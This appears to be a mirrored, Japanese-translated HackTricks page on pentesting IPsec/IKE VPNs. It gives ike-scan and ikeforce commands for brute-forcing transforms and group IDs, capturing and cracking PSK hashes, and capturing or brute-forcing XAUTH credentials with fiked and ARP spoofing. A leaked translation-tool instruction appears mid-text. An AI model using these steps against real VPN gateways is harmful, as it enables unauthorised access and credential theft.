Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 22:18:27 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/ipsec-ike-vpn-pentesting.md
Translator workflow e90c803209 Translated to Japanese
2023-07-07 23:42:27 +00:00

22 KiB
Raw Blame History

☁️ HackTricks クラウド ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

基本情報

IPsecは、ゲートウェイ間LAN間およびホストとゲートウェイリモートアクセスの企業VPNソリューションにおいて最も一般的に使用される技術です。

IKEはISAKMPInternet Security Association Key Management Protocolの一種であり、認証と鍵交換のためのフレームワークです。IKEは、3つのフェーズのプロセスを通じて2つのエンドポイント間のセキュリティアソシエーションSAを確立します。

  • フェーズ1 プリ共有キーPSKまたは証明書を使用して2つのエンドポイント間に安全なチャネルを確立します。メインモード3つのメッセージのペアまたはアグレッシブモードを使用することができます。
  • フェーズ1.5 これはオプションで、拡張認証フェーズと呼ばれ、接続しようとしているユーザー(ユーザー+パスワード)を認証します。
  • フェーズ2 ESPおよびAHを使用したデータセキュリティのパラメータを交渉します。フェーズ1で使用されたものとは異なるアルゴリズムを使用することができます完全な転送秘密鍵PFS

デフォルトポート: 500/udp

nmapを使用してサービスを検出する

root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT    STATE SERVICE
500/udp open  isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)

有効な変換を見つける

IPSecの設定は、1つまたはいくつかの変換を受け入れるように準備することができます。変換は値の組み合わせです。各変換には、暗号化アルゴリズムとしてDESまたは3DES、整合性アルゴリズムとしてSHAまたはMD5、認証タイプとして事前共有キー、鍵配布アルゴリズムとしてDiffie-Hellman 1または2、および28800秒の寿命など、いくつかの属性が含まれています。

したがって、最初に行うべきことは、有効な変換を見つけることです。これにより、サーバーがあなたと通信することができます。これを行うために、ツールike-scanを使用できます。デフォルトでは、ike-scanはメインモードで動作し、ISAKMPヘッダーと単一の提案を含むパケットをゲートウェイに送信します。提案には8つの変換が含まれています

応答に応じて、エンドポイントに関する情報を取得できます。

root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify

前の応答で見るように、AUTHというフィールドがあり、値はPSKです。これはVPNがプリシェアドキーを使用して構成されていることを意味しますこれはペンテスターにとって非常に良いことです最後の行の値も非常に重要です:

  • 0 returned handshake; 0 returned notify: これはターゲットがIPsecゲートウェイではないことを意味します。
  • 1 returned handshake; 0 returned notify: これはターゲットがIPsecに設定され、IKEのネゴシエーションを実行する意思があり、提案したトランスフォームのいずれかが受け入れ可能であることを意味します(有効なトランスフォームは出力に表示されます)。
  • 0 returned handshake; 1 returned notify: VPNゲートウェイは、受け入れ可能なトランスフォームがない場合には通知メッセージで応答します(ただし、一部のゲートウェイは応答しない場合もあります。その場合は、さらなる分析と改訂された提案を試す必要があります)。

したがって、この場合は既に有効なトランスフォームがありますが、3番目の場合は少しブルートフォースを行って有効なトランスフォームを見つける必要があります:

まず、すべての可能なトランスフォームを作成する必要があります:

for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done

そして、ike-scanを使用してそれぞれをブルートフォース攻撃しますこれには数分かかる場合があります:

while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt

もしブルートフォース攻撃がうまくいかなかった場合、サーバーが正当な変換に対してもハンドシェイクなしで応答している可能性があります。その場合、同じブルートフォース攻撃をアグレッシブモードで試すことができます。

while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt

以下は、/hive/hacktricks/network-services-pentesting/ipsec-ike-vpn-pentesting.mdというファイルからのコンテンツです。関連する英語のテキストを日本語に翻訳し、翻訳を返してください。翻訳では、マークダウンとHTMLの構文を正確に保ちます。コード、ハッキング技術の名前、ハッキングの言葉、クラウド/SaaSプラットフォームの名前Workspace、aws、gcpなど、'leak'という単語、pentesting、およびマークダウンタグなどは翻訳しないでください。また、翻訳とマークダウンの構文以外の追加の要素は追加しないでください。

希望通りに**有効な変換がエコーバックされる**ことを期待します。
[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py)を使用して**同じ攻撃**を試すこともできます。
[**ikeforce**](https://github.com/SpiderLabs/ikeforce)を使用して変換をブルートフォースで試すこともできます。

./ikeforce.py <IP> # No parameters are required for scan -h for additional help

DHグループ14 = 2048ビットMODPおよび15 = 3072ビット
2 = HMAC-SHA = SHA1この場合. --transの形式は$Enc,$Hash,$Auth,$DHです

特に、CiscoはDHグループ1および2の回避を推奨しています。論文の著者は、弱いグループ1,024ビット以下を使用してネゴシエートされたIPsecセッションを国家が離散対数の事前計算を介して復号できる可能性が高いと説明しています。

サーバーのフィンガープリント

次に、ike-scanを使用してデバイスのベンダーを特定することができます。このツールは初期提案を送信し、再生を停止します。その後、サーバーから受信したメッセージと一致する応答パターンの時間差分析することで、ペンテスターはVPNゲートウェイのベンダーを正確に特定できます。さらに、一部のVPNサーバーはIKEと一緒にオプションのベンダーIDVIDペイロードを使用します。

必要に応じて、有効な変換を指定します(--transを使用

IKEがベンダーを特定した場合、それを表示します

root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

IKE Backoff Patterns:

IP Address       No.  Recv time            Delta Time
172.16.21.200    1    1322286031.744904    0.000000
172.16.21.200    2    1322286039.745081    8.000177
172.16.21.200    3    1322286047.745989    8.000908
172.16.21.200    4    1322286055.746972    8.000983
172.16.21.200    Implementation guess: Cisco VPN Concentrator

Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify

これはnmapスクリプト_ike-version_でも実現できます。

正しいIDグループ名の検索

ハッシュをキャプチャするためには、アグレッシブモードをサポートし、正しいIDグループ名が必要です。おそらく正しいグループ名はわからないため、ブルートフォース攻撃を行う必要があります。 そのために、2つの方法をおすすめします。

ike-scanを使用したIDのブルートフォース攻撃

まず、ハッシュを収集するために偽のIDでリクエストを行ってみてください"-P"を使用)。

ike-scan -P -M -A -n fakeID <IP>

もしハッシュが返されない場合、おそらくこのブルートフォースの方法は機能するでしょう。ハッシュが返される場合、偽のIDに対して偽のハッシュが送り返されるため、この方法は信頼性がありません。例えば、偽のハッシュが返されることがあります(これは最新バージョンで起こります):

しかし、私が言ったように、ハッシュが返されない場合は、ike-scanを使用して一般的なグループ名をブルートフォースする必要があります。

このスクリプトは、可能なIDをブルートフォースし、有効なハンドシェイクが返されるIDを返します(これは有効なグループ名になります)。

特定の変換を発見した場合は、ike-scanコマンドに追加してください。そして、複数の変換を発見した場合は、すべてを試すために新しいループを追加してください正常に機能するまですべてを試す必要があります

ikeforceの辞書またはseclistsの辞書を使用して、一般的なグループ名をブルートフォースすることができます。

while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt

または、この辞書を使用します重複を排除した他の2つの辞書の組み合わせです

{% file src="../.gitbook/assets/vpnIDs.txt" %}

Ikerを使用したIDのブルートフォース

iker.pyは、ike-scanを使用して可能なグループ名をブルートフォースするためにも使用されます。ike-scanの出力に基づいて、有効なIDを見つけるための独自の方法を使用します。

ikeforceを使用したIDのブルートフォース

ikeforce.pyは、IDのブルートフォースにも使用できるツールです。このツールは、有効なIDと無効なIDを区別するために使用できるさまざまな脆弱性を試みます偽陽性と偽陰性が発生する可能性があるため、可能な場合はike-scanの方法を使用することをお勧めします

デフォルトでは、ikeforceは最初にいくつかのランダムなIDを送信して、サーバーの動作をチェックし、使用する戦術を決定します。

  • 最初の方法は、CiscoシステムのDead Peer Detection DPDの情報を検索して、グループ名が正しい場合にのみサーバーが再生する情報をブルートフォースすることです。

  • 利用可能な2番目の方法は、各試行に送信される応答の数をチェックすることです。正しいIDが使用されると、時にはより多くのパケットが送信されることがあります。

  • 3番目の方法は、不正なIDに対する応答で「INVALID-ID-INFORMATION」を検索することです。

  • 最後に、サーバーがチェックに対して何も応答しない場合、ikeforceはサーバーをブルートフォースして、正しいIDが送信されるとサーバーがパケットを返すかどうかを確認します。
    明らかに、IDのブルートフォースの目的は、有効なIDがある場合にPSKを取得することです。その後、idPSKを使用してXAUTH有効な場合をブルートフォースする必要があります。

特定の変換を発見した場合は、ikeforceコマンドに追加してください。複数の変換を発見した場合は、すべてを試すために新しいループを追加してくださいうまく機能するまですべてを試す必要があります

git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library

./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic

IDのスニッフィング

VPNクライアントとサーバー間の接続をスニッフィングすることで、有効なユーザー名を取得することも可能です。最初のアグレッシブモードパケットにはクライアントIDが平文で送信されるためです書籍「ネットワークセキュリティアセスメントネットワークを知る」から

ハッシュのキャプチャとクラック

最後に、有効な変換グループ名が見つかり、かつアグレッシブモードが許可されている場合、クラック可能なハッシュを簡単に取得することができます。

ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor

ハッシュは_hash.txt_に保存されます。

ハッシュをクラックするために、psk-crackjohnikescan2john.pyを使用)およびhashcatを使用することができます。

psk-crack -d <Wordlist_path> psk.txt

XAuth

ほとんどの実装では、グループ認証を行うためにPSKを使用したアグレッシブモードIKEを使用し、追加のユーザー認証を提供するためにXAUTHを使用しますMicrosoft Active Directory、RADIUS、または類似の方法を介してIKEv2では、ユーザーの認証にはXAUTHの代わりにEAPが使用されます。

ローカルネットワークのMitMによる資格情報のキャプチャ

したがって、_fiked_を使用してログインデータをキャプチャし、デフォルトのユーザー名があるかどうかを確認できますスニッフィングのためにIKEトラフィックをfikedにリダイレクトする必要があります。これはARPスプーフィングのヘルプを使用して行うことができます、詳細情報。FikedはVPNエンドポイントとして機能し、XAuthの資格情報をキャプチャします

fiked -g <IP> -k testgroup:secretkey -l output.txt -d

また、IPSecを使用してMitM攻撃を行い、ポート500へのすべてのトラフィックをブロックしてみてください。IPSecトンネルが確立できない場合、トラフィックはクリアテキストで送信されるかもしれません。

ikeforceを使用してXAUTHのユーザー名とパスワードをブルートフォースする

XAUTH(有効なグループ名idpskがわかっている場合)をブルートフォースするには、ユーザー名またはユーザー名のリストとパスワードのリストを使用できます:

./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]

この方法では、ikeforceはユーザー名とパスワードの組み合わせを使用して接続を試みます。

前の手順と同様に、1つ以上の有効なトランスフォームが見つかった場合は、それらを使用してください。

IPSEC VPNでの認証

Kaliでは、IPsecトンネルを確立するためにVPNCが使用されます。プロファイルは**/etc/vpnc/に配置する必要があり、ツールvpncを使用して呼び出すことができます。
以下は、書籍Network Security Assessment 3rd Edition**からの例です。

root@kali:~# cat > /etc/vpnc/vpntest.conf << STOP
IPSec gateway 10.0.0.250
IPSec ID vpntest
IPSec secret groupsecret123
IKE Authmode psk
Xauth username chris
Xauth password tiffers1
STOP
root@kali:~# vpnc vpntest
VPNC started in background (pid: 6980)...
root@kali:~# ifconfig tun0

参考資料

Shodan

  • port:500 IKE
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥